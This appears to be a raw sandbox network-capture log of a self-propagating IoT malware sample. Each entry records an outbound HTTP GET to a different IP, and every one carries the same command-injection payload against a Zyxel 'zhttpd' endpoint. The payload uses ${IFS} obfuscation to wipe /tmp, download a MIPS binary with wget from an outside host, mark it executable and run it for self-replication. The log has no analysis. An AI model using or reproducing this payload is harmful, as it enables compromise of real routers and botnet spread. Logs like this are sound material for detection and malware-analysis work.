                                    Jan 13, 2024 19:02:45.440062046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7133192.168.2.1345714185.212.38.151443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.440099001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7134192.168.2.133415868.132.141.160443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.440135956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7135192.168.2.1352056201.117.132.17443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.440174103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7136192.168.2.1338516179.92.55.197443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.440239906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7137192.168.2.135304490.93.45.232443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.440299988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7138192.168.2.135619253.190.17.255443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.440376043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7139192.168.2.1341600168.129.181.26443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.440437078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7140192.168.2.1351066125.192.203.74443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.440499067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7141192.168.2.1339894223.167.224.109443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.440550089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7142192.168.2.135003087.230.196.186443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.440588951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7143192.168.2.134028286.187.215.173443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.440632105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7144192.168.2.1356576165.159.113.57443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.440721035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7145192.168.2.1346130183.125.96.124443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.440743923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7146192.168.2.135931665.157.133.153443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.440824032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7147192.168.2.1341764133.229.191.105443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.440870047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7148192.168.2.135647231.44.143.217443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.440903902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7149192.168.2.1357388101.152.238.2443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.440953970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7150192.168.2.1347236126.178.80.101443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.441020966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7151192.168.2.1333454110.205.82.7443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.441080093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7152192.168.2.1342406160.93.94.173443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.441122055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7153192.168.2.13471662.110.42.136443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.441190958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7154192.168.2.134757089.24.148.93443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.441258907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7155192.168.2.1338556184.30.125.113443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.441327095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7156192.168.2.134430424.186.2.175443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.441354036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7157192.168.2.136065696.47.24.94443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.441386938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7158192.168.2.133809892.106.87.255443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.441454887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7159192.168.2.135001636.111.163.173443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.441509962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7160192.168.2.1348168190.157.131.26443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.441550016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7161192.168.2.1359694211.225.80.103443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.441622972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7162192.168.2.133778213.137.54.213443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.441647053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7163192.168.2.135755660.191.215.82443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.441720009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7164192.168.2.134539227.89.247.240443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.441771984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7165192.168.2.135209071.66.121.161443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.441792011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7166192.168.2.133549097.211.128.184443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.441860914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7167192.168.2.1351662220.59.229.82443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.441900015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7168192.168.2.1335830159.74.58.35443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.441967010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7169192.168.2.1357120184.77.220.242443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.442008018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7170192.168.2.1358822203.220.106.51443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.442056894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7171192.168.2.1352616139.237.36.35443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.442125082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7172192.168.2.13448981.81.116.76443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.442189932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7173192.168.2.13453204.142.185.145443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.442238092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7174192.168.2.1351172113.107.50.247443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.442295074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7175192.168.2.1356046136.146.0.111443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.442356110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7176192.168.2.13475005.236.237.111443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.442411900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7177192.168.2.1345858150.152.177.46443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.442456007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7178192.168.2.1337370133.21.33.65443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.442513943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7179192.168.2.135006246.102.190.178443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.442586899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7180192.168.2.1359450160.138.21.38443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.442661047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7181192.168.2.133602458.90.114.170443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.442734003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7182192.168.2.1351448114.43.237.222443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.442811966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7183192.168.2.134256445.236.24.185443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.442866087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7184192.168.2.1337824173.9.169.247443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.442929983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7185192.168.2.133488269.7.13.118443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.442981958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7186192.168.2.1341402117.140.151.150443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.443030119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7187192.168.2.1356272208.2.146.76443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.443090916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7188192.168.2.1353514118.102.4.250443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.443134069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7189192.168.2.1342866134.81.71.187443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.443191051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7190192.168.2.134763486.109.79.133443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.443253994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7191192.168.2.1351196198.251.59.212443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.443279028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7192192.168.2.135128691.219.146.84443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.443312883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7193192.168.2.1337764209.87.245.150443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.443363905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7194192.168.2.135144485.148.241.1443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.443401098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7195192.168.2.1345770176.60.146.18443
                                    TimestampBytes transferredDirectionData
